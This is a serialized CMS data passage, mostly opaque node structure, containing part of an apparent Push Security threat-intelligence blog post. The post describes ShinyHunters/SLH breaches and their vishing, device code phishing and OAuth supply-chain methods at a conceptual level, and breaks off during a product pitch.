odeType":864},{},[],{"data":16581,"content":16582,"nodeType":860},{},[16583],{"data":16584,"marks":16585,"value":6014,"nodeType":864},{},[],{"data":16587,"content":16588,"nodeType":860},{},[16589,16592,16598,16601,16607],{"data":16590,"marks":16591,"value":6021,"nodeType":864},{},[],{"data":16593,"content":16594,"nodeType":883},{"uri":6024},[16595],{"data":16596,"marks":16597,"value":6029,"nodeType":864},{},[],{"data":16599,"marks":16600,"value":6033,"nodeType":864},{},[],{"data":16602,"content":16603,"nodeType":883},{"uri":6036},[16604],{"data":16605,"marks":16606,"value":6041,"nodeType":864},{},[],{"data":16608,"marks":16609,"value":6045,"nodeType":864},{},[],{"data":16611,"content":16612,"nodeType":1312},{},[16613],{"data":16614,"marks":16615,"value":6053,"nodeType":864},{},[16616],{"type":899},{"data":16618,"content":16619,"nodeType":860},{},[16620,16623,16629,16632,16638],{"data":16621,"marks":16622,"value":6060,"nodeType":864},{},[],{"data":16624,"content":16625,"nodeType":883},{"uri":6063},[16626],{"data":16627,"marks":16628,"value":6068,"nodeType":864},{},[],{"data":16630,"marks":16631,"value":6072,"nodeType":864},{},[],{"data":16633,"content":16634,"nodeType":883},{"uri":6075},[16635],{"data":16636,"marks":16637,"value":6080,"nodeType":864},{},[],{"data":16639,"marks":16640,"value":6084,"nodeType":864},{},[],{"data":16642,"content":16643,"nodeType":860},{},[16644],{"data":16645,"marks":16646,"value":6091,"nodeType":864},{},[],{"data":16648,"content":16649,"nodeType":1312},{},[16650],{"data":16651,"marks":16652,"value":6099,"nodeType":864},{},[16653],{"type":899},{"data":16655,"content":16656,"nodeType":860},{},[16657,16660,16666],{"data":16658,"marks":16659,"value":6106,"nodeType":864},{},[],{"data":16661,"content":16662,"nodeType":883},{"uri":3259},[16663],{"data":16664,"marks":16665,"value":6113,"nodeType":864},{},[],{"data":16667,"marks":16668,"value":6117,"nodeType":864},{},[],{"data":16670,"content":16671,"nodeType":860},{},[16672],{"data":16673,"marks":16674,"value":6124,"nodeType":864},{},[],{"data":16676,"content":16677,"nodeType":860},{},[16678],{"data":16679,"marks":16680,"value":6131,"nodeType":864},{},[],{"data":16682,"content":16685,"nodeType":996},{"target":16683},{"sys":16684},{"id":6136,"type":1001,"linkType":1002},[],{"data":16687,"content":16688,"nodeType":860},{},[16689],{"data":16690,"marks":16691,"value":6144,"nodeType":864},{},[],{"data":16693,"content":16694,"nodeType":1312},{},[16695],{"data":16696,"marks":16697,"value":6152,"nodeType":864},{},[16698],{"type":899},{"data":16700,"content":16701,"nodeType":860},{},[16702,16705,16711],{"data":16703,"marks":16704,"value":6159,"nodeType":864},{},[],{"data":16706,"content":16707,"nodeType":883},{"uri":2411},[16708],{"data":16709,"marks":16710,"value":6166,"nodeType":864},{},[],{"data":16712,"marks":16713,"value":6170,"nodeType":864},{},[],{"data":16715,"content":16716,"nodeType":860},{},[16717],{"data":16718,"marks":16719,"value":6177,"nodeType":864},{},[],{"data":16721,"content":16722,"nodeType":860},{},[16723,16726,16733],{"data":16724,"marks":16725,"value":6184,"nodeType":864},{},[],{"data":16727,"content":16728,"nodeType":883},{"uri":2411},[16729],{"data":16730,"marks":16731,"value":6192,"nodeType":864},{},[16732],{"type":1455},{"data":16734,"marks":16735,"value":6196,"nodeType":864},{},[],{"data":16737,"content":16738,"nodeType":860},{},[16739],{"data":16740,"marks":16741,"value":6203,"nodeType":864},{},[],{"data":16743,"content":16744,"nodeType":1005},{},[],{"data":16746,"content":16747,"nodeType":1009},{},[16748],{"data":16749,"marks":16750,"value":6214,"nodeType":864},{},[16751],{"type":899},{"data":16753,"content":16754,"nodeType":860},{},[16755],{"data":16756,"marks":16757,"value":6221,"nodeType":864},{},[],{"data":16759,"content":16760,"nodeType":941},{},[16761,16779,16797,16815],{"data":16762,"content":16763,"nodeType":945},{},[16764],{"data":16765,"content":16766,"nodeType":860},{},[16767,16770,16776],{"data":16768,"marks":16769,"value":6234,"nodeType":864},{},[],{"data":16771,"content":16772,"nodeType":883},{"uri":6237},[16773],{"data":16774,"marks":16775,"value":6242,"nodeType":864},{},[],{"data":16777,"marks":16778,"value":6246,"nodeType":864},{},[],{"data":16780,"content":16781,"nodeType":945},{},[16782],{"data":16783,"content":16784,"nodeType":860},{},[16785,16788,16794],{"data":16786,"marks":16787,"value":6256,"nodeType":864},{},[],{"data":16789,"content":16790,"nodeType":883},{"uri":6259},[16791],{"data":16792,"marks":16793,"value":6264,"nodeType":864},{},[],{"data":16795,"marks":16796,"value":6268,"nodeType":864},{},[],{"data":16798,"content":16799,"nodeType":945},{},[16800],{"data":16801,"content":16802,"nodeType":860},{},[16803,16806,16812],{"data":16804,"marks":16805,"value":6234,"nodeType":864},{},[],{"data":16807,"content":16808,"nodeType":883},{"uri":6036},[16809],{"data":16810,"marks":16811,"value":6284,"nodeType":864},{},[],{"data":16813,"marks":16814,"value":6288,"nodeType":864},{},[],{"data":16816,"content":16817,"nodeType":945},{},[16818],{"data":16819,"content":16820,"nodeType":860},{},[16821,16824,16830],{"data":16822,"marks":16823,"value":2761,"nodeType":864},{},[],{"data":16825,"content":16826,"nodeType":883},{"uri":6300},[16827],{"data":16828,"marks":16829,"value":3756,"nodeType":864},{},[],{"data":16831,"marks":16832,"value":6308,"nodeType":864},{},[],{"data":16834,"content":16835,"nodeType":860},{},[16836],{"data":16837,"marks":16838,"value":6315,"nodeType":864},{},[],{"data":16840,"content":16841,"nodeType":860},{},[16842,16845,16849],{"data":16843,"marks":16844,"value":6322,"nodeType":864},{},[],{"data":16846,"marks":16847,"value":6327,"nodeType":864},{},[16848],{"type":899},{"data":16850,"marks":16851,"value":6331,"nodeType":864},{},[],{"data":16853,"content":16854,"nodeType":1005},{},[],{"data":16856,"content":16857,"nodeType":1009},{},[16858,16862,16867,16871,16876],{"data":16859,"marks":16860,"value":6342,"nodeType":864},{},[16861],{"type":899},{"data":16863,"marks":16864,"value":6348,"nodeType":864},{},[16865,16866],{"type":2246},{"type":899},{"data":16868,"marks":16869,"value":6353,"nodeType":864},{},[16870],{"type":899},{"data":16872,"marks":16873,"value":6359,"nodeType":864},{},[16874,16875],{"type":2246},{"type":899},{"data":16877,"marks":16878,"value":6364,"nodeType":864},{},[16879],{"type":899},{"data":16881,"content":16882,"nodeType":860},{},[16883,16886,16892],{"data":16884,"marks":16885,"value":6371,"nodeType":864},{},[],{"data":16887,"content":16888,"nodeType":883},{"uri":6374},[16889],{"data":16890,"marks":16891,"value":6379,"nodeType":864},{},[],{"data":16893,"marks":16894,"value":6383,"nodeType":864},{},[],{"data":16896,"content":16897,"nodeType":860},{},[16898],{"data":16899,"marks":16900,"value":6390,"nodeType":864},{},[],{"data":16902,"content":16903,"nodeType":860},{},[16904],{"data":16905,"marks":16906,"value":6397,"nodeType":864},{},[],{"data":16908,"content":16909,"nodeType":1005},{},[],{"data":16911,"content":16912,"nodeType":1009},{},[16913],{"data":16914,"marks":16915,"value":6408,"nodeType":864},{},[16916],{"type":899},{"data":16918,"content":16919,"nodeType":860},{},[16920,16923,16929],{"data":16921,"marks":16922,"value":6415,"nodeType":864},{},[],{"data":16924,"content":16925,"nodeType":883},{"uri":6418},[16926],{"data":16927,"marks":16928,"value":6423,"nodeType":864},{},[],{"data":16930,"marks":16931,"value":6427,"nodeType":864},{},[],{"data":16933,"content":16934,"nodeType":860},{},[16935],{"data":16936,"marks":16937,"value":6434,"nodeType":864},{},[],{"data":16939,"content":16940,"nodeType":860},{},[16941],{"data":16942,"marks":16943,"value":6441,"nodeType":864},{},[],{"data":16945,"content":16946,"nodeType":860},{},[16947,16950,16956],{"data":16948,"marks":16949,"value":6448,"nodeType":864},{},[],{"data":16951,"content":16952,"nodeType":883},{"uri":6451},[16953],{"data":16954,"marks":16955,"value":6423,"nodeType":864},{},[],{"data":16957,"marks":16958,"value":2924,"nodeType":864},{},[],{"data":16960,"content":16961,"nodeType":1005},{},[],{"data":16963,"content":16964,"nodeType":1009},{},[16965],{"data":16966,"marks":16967,"value":6469,"nodeType":864},{},[16968],{"type":899},{"data":16970,"content":16971,"nodeType":860},{},[16972],{"data":16973,"marks":16974,"value":6476,"nodeType":864},{},[],{"data":16976,"content":16977,"nodeType":941},{},[16978,16987,16996],{"data":16979,"content":16980,"nodeType":945},{},[16981],{"data":16982,"content":16983,"nodeType":860},{},[16984],{"data":16985,"marks":16986,"value":6489,"nodeType":864},{},[],{"data":16988,"content":16989,"nodeType":945},{},[16990],{"data":16991,"content":16992,"nodeType":860},{},[16993],{"data":16994,"marks":16995,"value":6499,"nodeType":864},{},[],{"data":16997,"content":16998,"nodeType":945},{},[16999],{"data":17000,"content":17001,"nodeType":860},{},[17002],{"data":17003,"marks":17004,"value":6509,"nodeType":864},{},[],{"data":17006,"content":17007,"nodeType":860},{},[17008],{"data":17009,"marks":17010,"value":6516,"nodeType":864},{},[],{"data":17012,"content":17013,"nodeType":860},{},[17014,17017,17023],{"data":17015,"marks":17016,"value":6523,"nodeType":864},{},[],{"data":17018,"content":17019,"nodeType":883},{"uri":5243},[17020],{"data":17021,"marks":17022,"value":6530,"nodeType":864},{},[],{"data":17024,"marks":17025,"value":2924,"nodeType":864},{},[],{"data":17027,"content":17028,"nodeType":860},{},[17029,17032,17038],{"data":17030,"marks":17031,"value":6540,"nodeType":864},{},[],{"data":17033,"content":17034,"nodeType":883},{"uri":6543},[17035],{"data":17036,"marks":17037,"value":6548,"nodeType":864},{},[],{"data":17039,"marks":17040,"value":6552,"nodeType":864},{},[],{"data":17042,"content":17045,"nodeType":996},{"target":17043},{"sys":17044},{"id":6557,"type":1001,"linkType":1002},[],{"data":17047,"content":17048,"nodeType":1005},{},[],{"data":17050,"content":17051,"nodeType":860},{},[17052],{"data":17053,"marks":17054,"value":6568,"nodeType":864},{},[],{"data":17056,"content":17057,"nodeType":860},{},[17058,17061,17067],{"data":17059,"marks":17060,"value":2707,"nodeType":864},{},[],{"data":17062,"content":17063,"nodeType":883},{"uri":1700},[17064],{"data":17065,"marks":17066,"value":2715,"nodeType":864},{},[],{"data":17068,"marks":17069,"value":2719,"nodeType":864},{},[],{"items":17071},[17072,17074],{"sys":17073,"name":6593},{"id":6592},{"sys":17075,"name":342},{"id":6596},{"items":17077},[17078],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":17079},{"url":2740},{"__typename":2059,"sys":17081,"content":17083,"title":18045,"synopsis":18046,"hashTags":59,"publishedDate":6586,"slug":18047,"tagsCollection":18048,"authorsCollection":18054},{"id":17082},"3jF1fypt08TNlSoWuoMWhj",{"json":17084},{"data":17085,"content":17086,"nodeType":856},{},[17087,17113,17144,17187,17230,17236,17248,17251,17259,17309,17316,17339,17345,17348,17356,17384,17391,17399,17405,17408,17416,17423,17441,17448,17490,17497,17500,17508,17527,17582,17585,17593,17611,17629,17637,17644,17656,17668,17680,17692,17708,17716,17723,17726,17732,17738,17753,17756,17764,17782,18039],{"data":17088,"content":17089,"nodeType":860},{},[17090,17094,17100,17104,17109],{"data":17091,"marks":17092,"value":17093,"nodeType":864},{},[],"ShinyHunters and the broader SLH (",{"data":17095,"content":17096,"nodeType":883},{"uri":6237},[17097],{"data":17098,"marks":17099,"value":6242,"nodeType":864},{},[],{"data":17101,"marks":17102,"value":17103,"nodeType":864},{},[],") collective have claimed breaches at thousands of organizations over the past twelve months across retail, technology, aviation, financial services, media, gaming, and education, in what amounts to the most sustained data theft and extortion operation in recent cybercrime history. SLH's genealogy traces through a merger of Scattered Spider, Lapsus$, and ShinyHunters, all parts of ",{"data":17105,"marks":17106,"value":17108,"nodeType":864},{},[17107],{"type":899},"the Com",{"data":17110,"marks":17111,"value":17112,"nodeType":864},{},[],", a broader community of English-speaking cybercriminals with international links. ",{"data":17114,"content":17115,"nodeType":860},{},[17116,17120,17128,17132,17140],{"data":17117,"marks":17118,"value":17119,"nodeType":864},{},[],"The confirmed victim list reads like a Fortune 500 directory: Coca-Cola, Cisco, Qantas, Coinbase, ADT, Aflac, SoundCloud, Rockstar Games, Charter Communications, and recently ",{"data":17121,"content":17123,"nodeType":883},{"uri":17122},"https://www.bleepingcomputer.com/news/security/instructure-confirms-data-breach-shinyhunters-claims-attack/",[17124],{"data":17125,"marks":17126,"value":17127,"nodeType":864},{},[],"Instructure",{"data":17129,"marks":17130,"value":17131,"nodeType":864},{},[]," — whose breach ",{"data":17133,"content":17135,"nodeType":883},{"uri":17134},"https://krebsonsecurity.com/2026/05/canvas-breach-disrupts-schools-colleges-nationwide/",[17136],{"data":17137,"marks":17138,"value":17139,"nodeType":864},{},[],"disrupted schools and universities nationwide",{"data":17141,"marks":17142,"value":17143,"nodeType":864},{},[]," during final exams — among dozens more named publicly and likely many more that haven't been (breaches settled quickly behind closed doors don't always make it into the public eye). ShinyHunters alone claimed over 1.5 billion stolen Salesforce records from a single campaign targeting more than 1,000 organizations.",{"data":17145,"content":17146,"nodeType":860},{},[17147,17151,17159,17163,17171,17175,17183],{"data":17148,"marks":17149,"value":17150,"nodeType":864},{},[],"Additional operating clusters, including Cordial Spider and Snarky Spider (which CrowdStrike ",{"data":17152,"content":17154,"nodeType":883},{"uri":17153},"https://cyberscoop.com/crowdstrike-cordial-spider-snarky-spider-extortion-attacks/",[17155],{"data":17156,"marks":17157,"value":17158,"nodeType":864},{},[],"characterizes as the new generation of Scattered Spider",{"data":17160,"marks":17161,"value":17162,"nodeType":864},{},[],") run parallel campaigns against different target sectors, unified not by shared infrastructure but by a shared playbook of techniques that exploit the structural weakness in modern SaaS-first organizations. ",{"data":17164,"content":17166,"nodeType":883},{"uri":17165},"https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-03-12-Vishing-Campaigns-Lead-to-Data-Theft-and-Extortion.txt",[17167],{"data":17168,"marks":17169,"value":17170,"nodeType":864},{},[],"Unit 42 documented",{"data":17172,"marks":17173,"value":17174,"nodeType":864},{},[]," these groups moving from initial compromise to complete data exfiltration in under an hour — faster than most organizations can even begin to respond. Newer groups with links to the SLH ecosystem like CoinbaseCartel have also continued the tradition of weaponizing stolen credentials from the infostealer economy at scale, as ShinyHunters did in the ",{"data":17176,"content":17178,"nodeType":883},{"uri":17177},"https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks/",[17179],{"data":17180,"marks":17181,"value":17182,"nodeType":864},{},[],"2024 Snowflake breach",{"data":17184,"marks":17185,"value":17186,"nodeType":864},{},[]," that compromised over 165 customer environments (and claimed another billion-plus records).",{"data":17188,"content":17189,"nodeType":860},{},[17190,17194,17202,17206,17214,17218,17226],{"data":17191,"marks":17192,"value":17193,"nodeType":864},{},[],"Not every SLH breach is browser-based — the Instructure breach (275 million individuals, ~330 school login portals defaced) began with a Salesforce tenant compromise in September 2025, but resurfaced in May 2026 after attackers exploited a ",{"data":17195,"content":17197,"nodeType":883},{"uri":17196},"https://www.bitdefender.com/en-gb/blog/businessinsights/technical-advisory-shinyhunters-breach-instructure-canvas-lms",[17198],{"data":17199,"marks":17200,"value":17201,"nodeType":864},{},[],"vulnerability affecting Canvas's Free-For-Teacher program",{"data":17203,"marks":17204,"value":17205,"nodeType":864},{},[]," (it's now been confirmed that Instructure \"",{"data":17207,"content":17209,"nodeType":883},{"uri":17208},"https://www.instructure.com/incident_update",[17210],{"data":17211,"marks":17212,"value":17213,"nodeType":864},{},[],"reached a settlement",{"data":17215,"marks":17216,"value":17217,"nodeType":864},{},[],"\" for the deletion of the data, and shut down the free account tier), while the Coinbase breach cost ",{"data":17219,"content":17221,"nodeType":883},{"uri":17220},"https://www.bleepingcomputer.com/news/security/coinbase-discloses-breach-faces-up-to-400-million-in-losses/",[17222],{"data":17223,"marks":17224,"value":17225,"nodeType":864},{},[],"$180M–400M through insider bribery",{"data":17227,"marks":17228,"value":17229,"nodeType":864},{},[]," — but these are the exceptions that prove the rule. ",{"data":17231,"content":17235,"nodeType":996},{"target":17232},{"sys":17233},{"id":17234,"type":1001,"linkType":1002},"4qNrbDyMJIumQfdbh9YVkU",[],{"data":17237,"content":17238,"nodeType":860},{},[17239,17244],{"data":17240,"marks":17241,"value":17243,"nodeType":864},{},[17242],{"type":899},"The vast majority of SLH campaigns over the past year converge on three browser-based attack vectors: vishing combined with AiTM phishing, device code phishing exploiting account authorization flows, and OAuth supply chain attacks through compromised third-party integrators.",{"data":17245,"marks":17246,"value":17247,"nodeType":864},{},[]," Each is well-documented, each has produced confirmed victims at scale, and each is detectable or preventable through browser-layer security controls.",{"data":17249,"content":17250,"nodeType":1005},{},[],{"data":17252,"content":17253,"nodeType":1009},{},[17254],{"data":17255,"marks":17256,"value":17258,"nodeType":864},{},[17257],{"type":899},"Vector 1: Vishing combined with AiTM phishing",{"data":17260,"content":17261,"nodeType":860},{},[17262,17266,17273,17276,17284,17287,17294,17298,17306],{"data":17263,"marks":17264,"value":17265,"nodeType":864},{},[],"The most visible campaign right now pairs targeted voice calls with adversary-in-the-middle phishing pages — an approach that ",{"data":17267,"content":17268,"nodeType":883},{"uri":11628},[17269],{"data":17270,"marks":17271,"value":17272,"nodeType":864},{},[],"Mandiant",{"data":17274,"marks":17275,"value":12878,"nodeType":864},{},[],{"data":17277,"content":17279,"nodeType":883},{"uri":17278},"https://www.crowdstrike.com/en-us/blog/defending-against-cordial-spider-and-snarky-spider-with-falcon-shield/",[17280],{"data":17281,"marks":17282,"value":17283,"nodeType":864},{},[]," CrowdStrike",{"data":17285,"marks":17286,"value":13294,"nodeType":864},{},[],{"data":17288,"content":17289,"nodeType":883},{"uri":17165},[17290],{"data":17291,"marks":17292,"value":17293,"nodeType":864},{},[]," Unit 42",{"data":17295,"marks":17296,"value":17297,"nodeType":864},{},[]," have all documented from the incident response side, and which Push has ",{"data":17299,"content":17301,"nodeType":883},{"uri":17300},"https://pushsecurity.com/blog/inside-criminal-phishing-panel/",[17302],{"data":17303,"marks":17304,"value":17305,"nodeType":864},{},[],"documented from inside the attacker's own operator panels",{"data":17307,"marks":17308,"value":2924,"nodeType":864},{},[],{"data":17310,"content":17311,"nodeType":860},{},[17312],{"data":17313,"marks":17314,"value":17315,"nodeType":864},{},[],"An attacker impersonating IT support calls the target employee, establishes urgency — often citing a \"mandatory passkey rollout\" or a \"security compliance update\" — and directs them to a victim-branded AiTM phishing page (typically at a domain like \u003Ccompany>sso.com or \u003Ccompany>internal.com). The attack is processed by a live human in real time, relaying credentials and MFA codes to the legitimate identity provider as they are entered, capturing the resulting session token, and granting the attacker an authenticated session. ",{"data":17317,"content":17318,"nodeType":860},{},[17319,17323,17330,17334],{"data":17320,"marks":17321,"value":17322,"nodeType":864},{},[],"One of the reasons that this method is becoming so widespread is the commoditization of effective tools. Push's ",{"data":17324,"content":17325,"nodeType":883},{"uri":17300},[17326],{"data":17327,"marks":17328,"value":17329,"nodeType":864},{},[],"infiltration of the criminal phishing panels",{"data":17331,"marks":17332,"value":17333,"nodeType":864},{},[]," identified over 400 linked domains across four distinct infrastructure clusters. ",{"data":17335,"marks":17336,"value":17338,"nodeType":864},{},[17337],{"type":899},"This mirrors the pattern that turned AiTM phishing from a specialist capability into an industrialized market with competing PhaaS platforms, but with the added complication that voice phishing as the delivery vector makes the attack invisible to traditional anti-phishing controls at the email layer.",{"data":17340,"content":17344,"nodeType":996},{"target":17341},{"sys":17342},{"id":17343,"type":1001,"linkType":1002},"1Yhthl0PILGW7EmCcZUrNv",[],{"data":17346,"content":17347,"nodeType":1005},{},[],{"data":17349,"content":17350,"nodeType":1009},{},[17351],{"data":17352,"marks":17353,"value":17355,"nodeType":864},{},[17354],{"type":899},"Vector 2: Vishing combined with device code phishing",{"data":17357,"content":17358,"nodeType":860},{},[17359,17362,17369,17373,17380],{"data":17360,"marks":17361,"value":2761,"nodeType":864},{},[],{"data":17363,"content":17364,"nodeType":883},{"uri":6259},[17365],{"data":17366,"marks":17367,"value":17368,"nodeType":864},{},[],"ShinyHunters Salesforce campaign",{"data":17370,"marks":17371,"value":17372,"nodeType":864},{},[]," that ran through 2025 and into 2026 used device code phishing as one of its core methods, ",{"data":17374,"content":17375,"nodeType":883},{"uri":17177},[17376],{"data":17377,"marks":17378,"value":17379,"nodeType":864},{},[],"compromising over 1,000 organizations and claiming 1.5 billion stolen records",{"data":17381,"marks":17382,"value":17383,"nodeType":864},{},[]," — including an attempted extortion of Salesforce itself. The attack involved registering an attacker-controlled \"DataLoader\" application mimicking a legitimate Salesforce tool, configuring it to request broad OAuth scopes including full API access and refresh token generation, and guiding victims through the device authorization flow via vishing calls.",{"data":17385,"content":17386,"nodeType":860},{},[17387],{"data":17388,"marks":17389,"value":17390,"nodeType":864},{},[],"Device code phishing exploits the OAuth 2.0 device authorization grant — a flow designed for devices without browsers, like smart TVs, but used in a wide range of scenarios including CLI logins — by tricking users into entering a code on Microsoft's (or another identity provider's) legitimate verification page. Since the victim is usually signed into the app in their browser, there’s no login at all. They simply navigate to the app’s device code login page and enter an attacker-provided code to grant the attacker an access token. ",{"data":17392,"content":17393,"nodeType":860},{},[17394],{"data":17395,"marks":17396,"value":17398,"nodeType":864},{},[17397],{"type":899},"This is what makes device code phishing structurally different from AiTM: it defeats all MFA (including passkeys) because the attack doesn’t target the login, but the authorization layer instead.",{"data":17400,"content":17404,"nodeType":996},{"target":17401},{"sys":17402},{"id":17403,"type":1001,"linkType":1002},"3ElQz8sLATnR8RY5nVlBGM",[],{"data":17406,"content":17407,"nodeType":1005},{},[],{"data":17409,"content":17410,"nodeType":1009},{},[17411],{"data":17412,"marks":17413,"value":17415,"nodeType":864},{},[17414],{"type":899},"Vector 3: OAuth supply chain attacks through compromised integrators",{"data":17417,"content":17418,"nodeType":860},{},[17419],{"data":17420,"marks":17421,"value":17422,"nodeType":864},{},[],"The third vector does not require the attacker to phish the victim organization's employees at all. Instead, it exploits the OAuth trust relationships that organizations create when they connect third-party SaaS vendors into their environments — and the consequence is that every organization that authorized one of these integrations effectively extended its security boundary to include the vendor's own security posture.",{"data":17424,"content":17425,"nodeType":860},{},[17426,17429,17437],{"data":17427,"marks":17428,"value":2761,"nodeType":864},{},[],{"data":17430,"content":17432,"nodeType":883},{"uri":17431},"https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift",[17433],{"data":17434,"marks":17435,"value":17436,"nodeType":864},{},[],"Salesloft/Drift supply chain attack",{"data":17438,"marks":17439,"value":17440,"nodeType":864},{},[]," demonstrated this at scale in 2025: in an extension of the previously mentioned device code phishing campaign, the attacker compromised Salesloft's GitHub environment, used TruffleHog to find secrets, stole Drift OAuth tokens, and used them to access downstream Salesforce environments. The same pattern was later repeated at Gainsight. ",{"data":17442,"content":17443,"nodeType":860},{},[17444],{"data":17445,"marks":17446,"value":17447,"nodeType":864},{},[],"Along with the previously mentioned device code phishing attacks,  more than 1000 organizations were breached. The attackers then harvested AWS keys, Snowflake credentials, and stored passwords from breached Salesforce instances, compounding the access into progressively wider reach.",{"data":17449,"content":17450,"nodeType":860},{},[17451,17455,17463,17467,17475,17479,17486],{"data":17452,"marks":17453,"value":17454,"nodeType":864},{},[],"The same structural pattern has continued into 2026 with the Anodot supply chain compromise, which has produced confirmed breaches at ",{"data":17456,"content":17458,"nodeType":883},{"uri":17457},"https://www.bleepingcomputer.com/news/security/vimeo-data-breach-exposes-personal-information-of-119-000-people/",[17459],{"data":17460,"marks":17461,"value":17462,"nodeType":864},{},[],"Vimeo",{"data":17464,"marks":17465,"value":17466,"nodeType":864},{},[]," (119,000 users), Rockstar Games (78.6 million records), and ",{"data":17468,"content":17470,"nodeType":883},{"uri":17469},"https://www.bleepingcomputer.com/news/security/zara-data-breach-exposed-personal-information-of-197-000-people/",[17471],{"data":17472,"marks":17473,"value":17474,"nodeType":864},{},[],"Zara/Inditex",{"data":17476,"marks":17477,"value":17478,"nodeType":864},{},[]," (197,000 people), with further downstream victims likely still emerging. The ",{"data":17480,"content":17481,"nodeType":883},{"uri":4103},[17482],{"data":17483,"marks":17484,"value":17485,"nodeType":864},{},[],"Vercel breach",{"data":17487,"marks":17488,"value":17489,"nodeType":864},{},[],", which involved compromised OAuth tokens from Context.ai cascading into Google Workspace, also reinforces the same attack pattern (though it was likely not a ShinyHunters operation despite being claimed by someone pretending to be them).",{"data":17491,"content":17492,"nodeType":860},{},[17493],{"data":17494,"marks":17495,"value":17496,"nodeType":864},{},[],"A forgotten SaaS integration can easily become the pivot point for downstream compromise. The moment you authorize a third-party integration, your security boundary extends to include that vendor. If the third-party is compromised, every downstream customer organization with an active integration is exposed.",{"data":17498,"content":17499,"nodeType":1005},{},[],{"data":17501,"content":17502,"nodeType":1009},{},[17503],{"data":17504,"marks":17505,"value":17507,"nodeType":864},{},[17506],{"type":899},"The infostealer credential playbook sits alongside these attacks",{"data":17509,"content":17510,"nodeType":860},{},[17511,17515,17523],{"data":17512,"marks":17513,"value":17514,"nodeType":864},{},[],"Alongside the three vectors above, ShinyHunters has a track record of exploiting the infostealer credential economy at scale — and it predates any of them. The 2024 Snowflake campaign — 165+ customer environments compromised, over a billion records stolen from AT&T, Ticketmaster, Santander, and Advance Auto Parts among others — was built entirely on infostealer-harvested credentials replayed against MFA-less tenants, with ",{"data":17516,"content":17518,"nodeType":883},{"uri":17517},"https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion",[17519],{"data":17520,"marks":17521,"value":17522,"nodeType":864},{},[],"Mandiant's investigation",{"data":17524,"marks":17525,"value":17526,"nodeType":864},{},[]," finding that 80% of compromised accounts had prior breach exposure in datasets dating back to 2020. The credentials were already circulating in criminal marketplaces; ShinyHunters simply purchased and operationalized them at industrial scale.",{"data":17528,"content":17529,"nodeType":860},{},[17530,17534,17542,17546,17554,17558,17566,17570,17578],{"data":17531,"marks":17532,"value":17533,"nodeType":864},{},[],"The same methodology powered the ",{"data":17535,"content":17537,"nodeType":883},{"uri":17536},"https://pushsecurity.com/blog/why-attackers-are-targeting-jira-with-stolen-credentials/",[17538],{"data":17539,"marks":17540,"value":17541,"nodeType":864},{},[],"HellCat Jira campaign",{"data":17543,"marks":17544,"value":17545,"nodeType":864},{},[]," through 2024–2025, and has now been industrialized as a standalone operation by ",{"data":17547,"content":17549,"nodeType":883},{"uri":17548},"https://www.halcyon.ai/jp/threat-group/coinbasecartel",[17550],{"data":17551,"marks":17552,"value":17553,"nodeType":864},{},[],"CoinbaseCartel",{"data":17555,"marks":17556,"value":17557,"nodeType":864},{},[],", another criminal group reported to be an offshoot of SLH. CoinbaseCartel's model is familiar: purchase old infostealer credentials, use them to access cloud and development environments, exfiltrate data, and demand ransom. ",{"data":17559,"content":17561,"nodeType":883},{"uri":17560},"https://www.infostealers.com/article/inside-the-coinbase-cartel-how-infostealer-credentials-fueled-a-100-company-ransomware-spree/",[17562],{"data":17563,"marks":17564,"value":17565,"nodeType":864},{},[],"Hudson Rock's analysis",{"data":17567,"marks":17568,"value":17569,"nodeType":864},{},[]," of the group's 170+ claimed victims confirms that roughly 80% had prior infostealer infections predating the attacks. The most recent named victim is ",{"data":17571,"content":17573,"nodeType":883},{"uri":17572},"https://www.bleepingcomputer.com/news/security/grafana-says-stolen-github-token-let-hackers-steal-codebase/",[17574],{"data":17575,"marks":17576,"value":17577,"nodeType":864},{},[],"Grafana",{"data":17579,"marks":17580,"value":17581,"nodeType":864},{},[],", where a GitHub token compromised via the TanStack npm supply chain attack and missed during credential rotation was used to download the codebase and attempt extortion. ",{"data":17583,"content":17584,"nodeType":1005},{},[],{"data":17586,"content":17587,"nodeType":1009},{},[17588],{"data":17589,"marks":17590,"value":17592,"nodeType":864},{},[17591],{"type":899},"These attacks all happen in the browser",{"data":17594,"content":17595,"nodeType":860},{},[17596,17600,17607],{"data":17597,"marks":17598,"value":17599,"nodeType":864},{},[],"Every one of these attack chains is a browser-based attack that either occurs in the browser (AiTM phishing, device code phishing) or could have been prevented at the browser layer (OAuth consent governance). The techniques are interchangeable — the",{"data":17601,"content":17602,"nodeType":883},{"uri":3259},[17603],{"data":17604,"marks":17605,"value":17606,"nodeType":864},{},[]," same criminal kits now offer AiTM and device code phishing side by side",{"data":17608,"marks":17609,"value":17610,"nodeType":864},{},[],", and the same threat actor (ShinyHunters) has used all three vectors across different campaigns within the same twelve-month period.",{"data":17612,"content":17613,"nodeType":860},{},[17614,17618,17625],{"data":17615,"marks":17616,"value":17617,"nodeType":864},{},[],"Additionally, infostealer infections themselves are increasingly delivered through browser-based methods like ",{"data":17619,"content":17621,"nodeType":883},{"uri":17620},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection",[17622],{"data":17623,"marks":17624,"value":315,"nodeType":864},{},[],{"data":17626,"marks":17627,"value":17628,"nodeType":864},{},[],", closing the loop between the credential supply side and the browser-layer detection point.",{"data":17630,"content":17631,"nodeType":1312},{},[17632],{"data":17633,"marks":17634,"value":17636,"nodeType":864},{},[17635],{"type":899},"How Push can help",{"data":17638,"content":17639,"nodeType":860},{},[17640],{"data":17641,"marks":17642,"value":17643,"nodeType":864},{},[],"Push operates at the exact point in each of these attack chains where automated intervention can still prevent the compromise. ",{"data":17645,"content":17646,"nodeType":860},{},[17647,17652],{"data":17648,"marks":17649,"value":17651,"nodeType":864},{},[17650],{"type":899},"For vishing + AiTM attacks, ",{"data":17653,"marks":17654,"value":17655,"nodeType":864},{},[],"Push's behavioral phishing detection analyzes and blocks the phishing page in real time by detecting it from the user's browser — regardless of the domains used, hosting infrastructure, or where the URL was delivered.  ",{"data":17657,"content":17658,"nodeType":860},{},[17659,17664],{"data":17660,"marks":17661,"value":17663,"nodeType":864},{},[17662],{"type":899},"For device code phishing,",{"data":17665,"marks":17666,"value":17667,"nodeType":864},{},[]," Push detects the phishing pages associated with device code phishing kits — including generic, technique-class detections that catch new kits without requiring 